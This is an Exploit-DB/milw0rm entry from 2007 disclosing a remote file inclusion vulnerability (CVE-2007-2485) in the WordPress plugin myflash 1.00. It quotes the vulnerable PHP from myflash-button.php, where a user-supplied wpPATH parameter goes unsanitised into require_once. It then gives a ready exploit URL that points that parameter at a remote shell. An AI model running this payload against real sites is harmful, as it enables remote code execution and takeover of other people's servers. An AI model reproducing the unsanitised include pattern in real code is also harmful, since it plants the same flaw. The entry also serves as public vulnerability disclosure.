WordPress Plugin myflash 1.00 - 'wppath' Remote File Inclusion

EDB-ID:

3828

CVE:

2007-2485

EDB Verified:

Author:

Crackers_Child

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-05-01

Vulnerable App:

--------------------------------- [ Oyle Kahpe Ki DÃ¼nya ! ] --------------------------------------

Title : Wordpress plugin myflash <= V1.00  (wppath) RFI Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: cybermilitan@hotmail.com

--------------------------------------------------------------------------------


------------------------- -------------------------------------------------------

Application :  Wordpress plugin

Web Site    :  http://alexrabe.boelinger.com/

--------------------------------------------------------------------------------
Vuln Ä°n  myflash-button.php

if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');

global $wpdb;
--------------------------------------------------------------------------------

Exploit:

http://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?

--------------------------------------------------------------------------------

greets:

Every Body

--------------------------------------------------------------------------------



--------------------------------- [http://www.biyosecurity.net ] --------------------------------------

# milw0rm.com [2007-05-01]

Tags: WordPress Plugin

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services